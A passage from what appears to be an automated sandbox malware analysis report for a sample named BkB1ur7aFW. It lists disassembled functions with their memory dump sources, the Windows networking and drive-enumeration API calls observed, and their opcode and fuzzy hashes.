                                                              • Associated: 00000000.00000002.2025247401.0000000000ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025567078.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025667068.0000000000FFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025682572.0000000000FFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: send
                                                              • String ID:
                                                              • API String ID: 2809346765-0
                                                              • Opcode ID: b7829f4e7694bc3656e3453eebbfdc5abf1b23ddf46d1b2d752baddde17bfeb0
                                                              • Instruction ID: 0dbca1266fa15346a5ae4e82f34c2a52d7e4a61d30189d79b06a909b9e482613
                                                              • Opcode Fuzzy Hash: b7829f4e7694bc3656e3453eebbfdc5abf1b23ddf46d1b2d752baddde17bfeb0
                                                              • Instruction Fuzzy Hash: 8E01A7B1B007109FD7148F14D845B5BB7A5EF84720F0A8559E9982B361C331AC109BE1
                                                              Function 0713049A Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE(?,?,000096CF,-5E0F7D11,-5E0F7D11), ref: 0713050A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID:
                                                              • API String ID: 999431828-0
                                                              • Opcode ID: f93384da0c934f2b2827ee7b84fcb1ce830508889941343e0bd82332409cbe75
                                                              • Instruction ID: 74eb368e985dd2ffc1d9963fc2c128058b8d1e999c82252c5c07f686a10c5274
                                                              • Opcode Fuzzy Hash: f93384da0c934f2b2827ee7b84fcb1ce830508889941343e0bd82332409cbe75
                                                              • Instruction Fuzzy Hash: D0F08BF951C662DFEB0A9AB061CD2FC3BFBAF5F325F210857E446915C2DB5407418522
                                                              Function 07130518 Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE(?,?,000096CF,-5E0F7D11,-5E0F7D11), ref: 0713050A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID:
                                                              • API String ID: 999431828-0
                                                              • Opcode ID: 915b1ff10983301454d5c9089291127b4ce0b05f2a39710312219b3323ffeece
                                                              • Instruction ID: a4011a2759377030395456d4562cc4132281ca3a782b5ec90863c9535a7a91ed
                                                              • Opcode Fuzzy Hash: 915b1ff10983301454d5c9089291127b4ce0b05f2a39710312219b3323ffeece
                                                              • Instruction Fuzzy Hash: 10F054E9E1C1629DEA0151B015552F77FFB670F662B215C43D146D99C2F345CF078491
                                                              Function 004BA8C0 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,004A712E,?,?,?,00001001,00000000), ref: 004BA90C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              • Associated: 00000000.00000002.2024439507.00000000003F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025247401.0000000000ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025567078.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025667068.0000000000FFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025682572.0000000000FFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: recvfrom
                                                              • String ID:
                                                              • API String ID: 846543921-0
                                                              • Opcode ID: 2ed9355244da5767b3d47ced87674179ca58032c25e95c8ed672de098deb4073
                                                              • Instruction ID: 340794312a52ca9d269ea0ef81e0e8fc9eca7c059836edd6ba5ab2e8638f2705
                                                              • Opcode Fuzzy Hash: 2ed9355244da5767b3d47ced87674179ca58032c25e95c8ed672de098deb4073
                                                              • Instruction Fuzzy Hash: 36F06DB5109308BFD2209E01DC44DABBBEDEFC9754F05496DF948233118270AE20DAB6
                                                              Function 004BAF30 Relevance: 1.5, APIs: 1, Instructions: 29networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • socket.WS2_32(?,004BB280,00000000,-00000001,00000000,004BB280,?,?,00000002,00000011,?,?,00000000,0000000B,?,?), ref: 004BAF67
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              • Associated: 00000000.00000002.2024439507.00000000003F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025247401.0000000000ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025567078.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025667068.0000000000FFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025682572.0000000000FFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: socket
                                                              • String ID:
                                                              • API String ID: 98920635-0
                                                              • Opcode ID: 6a0df4ed29e3e61940e3a1ba6a2062037b9c95548fdebac5f8530313ae3d5c27
                                                              • Instruction ID: d8e01cb142391b075c6d5d7dca168c0732e541fa90ea29cc9f67ce70f9cf88db
                                                              • Opcode Fuzzy Hash: 6a0df4ed29e3e61940e3a1ba6a2062037b9c95548fdebac5f8530313ae3d5c27
                                                              • Instruction Fuzzy Hash: 1BE0EDB6A092216BD654DE1CE8449EBF369EFC8B20F094A4AB85467304C330AC50C7F2
                                                              Function 07130501 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE(?,?,000096CF,-5E0F7D11,-5E0F7D11), ref: 0713050A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID:
                                                              • API String ID: 999431828-0
                                                              • Opcode ID: efb768bebc91752717ed9b2fd9792c4964b02a385341dd5feb134bdfa007dfbb
                                                              • Instruction ID: cc7d6271603499895da5886da05ce7ec8f4264390060919e027616d07ef4fc3e
                                                              • Opcode Fuzzy Hash: efb768bebc91752717ed9b2fd9792c4964b02a385341dd5feb134bdfa007dfbb
                                                              • Instruction Fuzzy Hash: 63D022C8668069F9A800307409892FE2AFF279F310FA328437406F2CC063849B828067
                                                              Function 004BB020 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • closesocket.WS2_32(?,004B9422,?,?,?,?,?,?,?,?,?,?,?,w3J,00884C60,00000000), ref: 004BB04D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              • Associated: 00000000.00000002.2024439507.00000000003F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025247401.0000000000ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025567078.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025667068.0000000000FFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025682572.0000000000FFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: closesocket
                                                              • String ID:
                                                              • API String ID: 2781271927-0
                                                              • Opcode ID: b968801cb5afc7ea571900a0c8c75e077e19f22900440d31148d598c4b804207
                                                              • Instruction ID: f64a009063c868b90f7d5cbc385a17eb1e0e0c741e771a11656a7003a7bf3128
                                                              • Opcode Fuzzy Hash: b968801cb5afc7ea571900a0c8c75e077e19f22900440d31148d598c4b804207
                                                              • Instruction Fuzzy Hash: 21D0C23430020157CA20AA18C8C4AAB732BBFC1310FA8CB68E02C4A251D73FCC4386A1
                                                              Function 004567E0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ioctlsocket.WS2_32(?,8004667E,?,?,0042AF56,?,00000001), ref: 004567FC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              • Associated: 00000000.00000002.2024439507.00000000003F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025247401.0000000000ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025567078.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025667068.0000000000FFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025682572.0000000000FFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: ioctlsocket
                                                              • String ID:
                                                              • API String ID: 3577187118-0
                                                              • Opcode ID: 6fb467786359e96f6a6c8c9c827a236451034f883f79fe09f33dcb7e7097999b
                                                              • Instruction ID: b1655764e4dcdbc3f01eeb42c5cdaf68e392172bccfb74209a509df258ccb336
                                                              • Opcode Fuzzy Hash: 6fb467786359e96f6a6c8c9c827a236451034f883f79fe09f33dcb7e7097999b
                                                              • Instruction Fuzzy Hash: 9DC080F121C101BFD70C8714D455B2F77E8DB84355F01581CB086D1180FA345990CF17
                                                              Function 07110910 Relevance: .4, Instructions: 375COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036208525.0000000007110000.00000040.00001000.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7110000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 13674919a083225a23919db85efcee6bfaa6cb28293f2acc5b4466de1ad1d716
                                                              • Instruction ID: 65db9e91295800b56f01133184de4aeccc3d51a2a28d9f90bae245ec47670d55
                                                              • Opcode Fuzzy Hash: 13674919a083225a23919db85efcee6bfaa6cb28293f2acc5b4466de1ad1d716
                                                              • Instruction Fuzzy Hash: E4718AEB92D124BDB51AC0416F60AFB6B6DE1DB730B32C43AF807D9186E3944ECA5131
                                                              Function 0711099C Relevance: .4, Instructions: 360COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036208525.0000000007110000.00000040.00001000.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7110000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d2becf2979b75008584ef34c587e2e74367bbdb6b0c2ac9a3580944e49161da5
                                                              • Instruction ID: c732ee792678de497eccb95a8e445d272c8a64d61b95e756d031a9308d53cdec
                                                              • Opcode Fuzzy Hash: d2becf2979b75008584ef34c587e2e74367bbdb6b0c2ac9a3580944e49161da5
                                                              • Instruction Fuzzy Hash: 3C619CEB92C124BDB509C0426F24AFB676EE1DB730B32C43AF807D9181E3948EC95031
                                                              Function 0711093A Relevance: .4, Instructions: 359COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036208525.0000000007110000.00000040.00001000.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7110000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ecab44fc77221bb68a0e2fbe1f2e1179560157ccfac8687a9f3e37c9f43a5e0b
                                                              • Instruction ID: 3e2a227d4d88f6fad3d4839570ee3dcac3d82d815b245f532c12eea6a86facba
                                                              • Opcode Fuzzy Hash: ecab44fc77221bb68a0e2fbe1f2e1179560157ccfac8687a9f3e37c9f43a5e0b
                                                              • Instruction Fuzzy Hash: 33615AEBA2D125BD7509C0426B64AFB676EE1DB730B32C43AF807D9585E3948ECA5031
                                                              Function 0711099A Relevance: .4, Instructions: 350COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036208525.0000000007110000.00000040.00001000.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7110000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9ea8a62388af62cbd08ced40de53d45ea67edef0a16266c3af360adf3a0ccf72
                                                              • Instruction ID: 08abada1cb7236e0b0b2efe62f82fcbea5bf8e50d4c982b919c7cbc1191c9f0f
                                                              • Opcode Fuzzy Hash: 9ea8a62388af62cbd08ced40de53d45ea67edef0a16266c3af360adf3a0ccf72
                                                              • Instruction Fuzzy Hash: B6616AEB92D124BD7509C0426F64AFB676EE1DB730B32C43AF807D9585E3948EC95031
                                                              Function 07110A3D Relevance: .3, Instructions: 344COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036208525.0000000007110000.00000040.00001000.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7110000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8cf3a65631f78bd0d1fbc6d4c9157c49fbb11a49af7ac4b98a965bdab439eab0
                                                              • Instruction ID: 5666bdefaabb9c36ee205fc3de10b1d460b7e3dfdc3d50e3e384c01be2a8fd62
                                                              • Opcode Fuzzy Hash: 8cf3a65631f78bd0d1fbc6d4c9157c49fbb11a49af7ac4b98a965bdab439eab0
                                                              • Instruction Fuzzy Hash: F1615BEBA2D125BD7509C0813B64AFB676EE1DB730B32C43AF807D9585E3948ECA5031
                                                              Function 071109CD Relevance: .3, Instructions: 341COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036208525.0000000007110000.00000040.00001000.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7110000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ec9eff82eb54a1f8e4ded9eb20a2a470ced33a07b9f21d0a2c6f5ac6b8dcf936
                                                              • Instruction ID: 86bd49bca2c724f632845c4e34cadad7d99dc7cd4036f9aeec0897aea4fa49fb
                                                              • Opcode Fuzzy Hash: ec9eff82eb54a1f8e4ded9eb20a2a470ced33a07b9f21d0a2c6f5ac6b8dcf936
                                                              • Instruction Fuzzy Hash: C3515AEB92D124BD7519C0416F54AFB676EE1DB730B32C43AF807D9585E3948ECA5031
                                                              Function 071109D9 Relevance: .3, Instructions: 337COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036208525.0000000007110000.00000040.00001000.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7110000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 33603597af4b41cd8b1c95b758e60543b861b0c35164052f033c36a777da98a6
                                                              • Instruction ID: dd41a22b47e342010baefcc99cb29e330090f06876a2db4a22f54cceec842859
                                                              • Opcode Fuzzy Hash: 33603597af4b41cd8b1c95b758e60543b861b0c35164052f033c36a777da98a6
                                                              • Instruction Fuzzy Hash: 91517CEBA2C114BD7509C0826F54AFB676EE1DB730B32C43AF807D9586E3948ECA5031
                                                              Function 07110A10 Relevance: .3, Instructions: 320COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036208525.0000000007110000.00000040.00001000.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7110000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a52f48fbbb08644153e558e6f281907b7e50aec2d5963b4ed47a67ca36c5dfc2
                                                              • Instruction ID: 6a0a5b2d79e7bd1e51ee4acb10be547cc02e779976c9082ae3b080b9a02a170b
                                                              • Opcode Fuzzy Hash: a52f48fbbb08644153e558e6f281907b7e50aec2d5963b4ed47a67ca36c5dfc2
                                                              • Instruction Fuzzy Hash: 095179EBA2D115BD7519C0822B54AFB676EE1DF730B32C43AF807D9582E3948ECA5031
                                                              Function 07110A2C Relevance: .3, Instructions: 310COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036208525.0000000007110000.00000040.00001000.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7110000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4f3560c95f0dfafc0938c51ffce12d1f2c5ad793200b46146f039328f01ab454
                                                              • Instruction ID: 28668d0f68849d2c8e15eb008bce5b1119ae0a6dbccb4107b1f10cb1ed0c8b9d
                                                              • Opcode Fuzzy Hash: 4f3560c95f0dfafc0938c51ffce12d1f2c5ad793200b46146f039328f01ab454
                                                              • Instruction Fuzzy Hash: 51517AEBA2D125BD7519C0412F10AFB676EE1DBB30B32C43AF807D9585E3948ECA5031
                                                              Function 07110A70 Relevance: .3, Instructions: 305COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036208525.0000000007110000.00000040.00001000.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7110000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d7cb5747166258a8fa4d42d248d2402ec52e92b519b7a5324f31ffc76e4410fa
                                                              • Instruction ID: fcff1799c68b392035fc3275df9a52a1e18f957a7ca2a6fe8daa506d21e99ac6
                                                              • Opcode Fuzzy Hash: d7cb5747166258a8fa4d42d248d2402ec52e92b519b7a5324f31ffc76e4410fa
                                                              • Instruction Fuzzy Hash: 6651F3EBA2D114BDB60AC4412B54AFB277DE5DB730B32847AF803DE581E3548ECA4131
                                                              Function 07110B55 Relevance: .3, Instructions: 272COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036208525.0000000007110000.00000040.00001000.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7110000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d0df08688e8ac9c0cf29fe790ffea139cfb68d06f222b4ceb37cce69a639bd88
                                                              • Instruction ID: 3b223a3da60e9abcff5c67d85abad1c4b24d6d0b97a624ae56f0374245d925c5
                                                              • Opcode Fuzzy Hash: d0df08688e8ac9c0cf29fe790ffea139cfb68d06f222b4ceb37cce69a639bd88
                                                              • Instruction Fuzzy Hash: 4B519CEBA2D115BD750AC4426B54AFB6B2EE1DF730B32C43AF807D9185E3948ECA4035
                                                              Function 07110ADF Relevance: .3, Instructions: 271COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036208525.0000000007110000.00000040.00001000.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7110000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b952ad6165816760420b3df9a52eb4469af4f789ca5826124d7c7572538f0752
                                                              • Instruction ID: 3f8f307189a320e8efea33baec8b419b0b18a68506ac61452825dd0dcdff0f27
                                                              • Opcode Fuzzy Hash: b952ad6165816760420b3df9a52eb4469af4f789ca5826124d7c7572538f0752
                                                              • Instruction Fuzzy Hash: 91519CEBA2D115BD7509C4422F10AFB6B2EE1DB730B32C43AF807D9182E3548ECA5035
                                                              Function 07110ACC Relevance: .3, Instructions: 267COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036208525.0000000007110000.00000040.00001000.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7110000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9f85e192f77456acce9c2b0e18f250a4d110e118407eaf52da53cd25ee975c5d
                                                              • Instruction ID: 74c2074c0fad758151f880334ab910a0ed5dd7f441a3e229a51f3559e87606d7
                                                              • Opcode Fuzzy Hash: 9f85e192f77456acce9c2b0e18f250a4d110e118407eaf52da53cd25ee975c5d
                                                              • Instruction Fuzzy Hash: BC518BEBA2D025BD7509C0822B14AFB272EE1DF730B32C43AF807D9581E3948ECA5031
                                                              Function 07110B0F Relevance: .3, Instructions: 254COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036208525.0000000007110000.00000040.00001000.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7110000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1754b4caffcea98f33c0c9b442886875b6bff7214fce323c0f8e53170fb0e6c1
                                                              • Instruction ID: 4105fb07e93af7a543d646ef71cef419837b3e18790ff12c39123c697fb9ba16
                                                              • Opcode Fuzzy Hash: 1754b4caffcea98f33c0c9b442886875b6bff7214fce323c0f8e53170fb0e6c1
                                                              • Instruction Fuzzy Hash: 3851BEEB92D114BD760AC0812F10AFB6B2EE1CB730B32C47AF807D9186E3548EC95131
                                                              Function 07110B99 Relevance: .2, Instructions: 245COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036208525.0000000007110000.00000040.00001000.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                              Joe Sandbox IDA Plugin
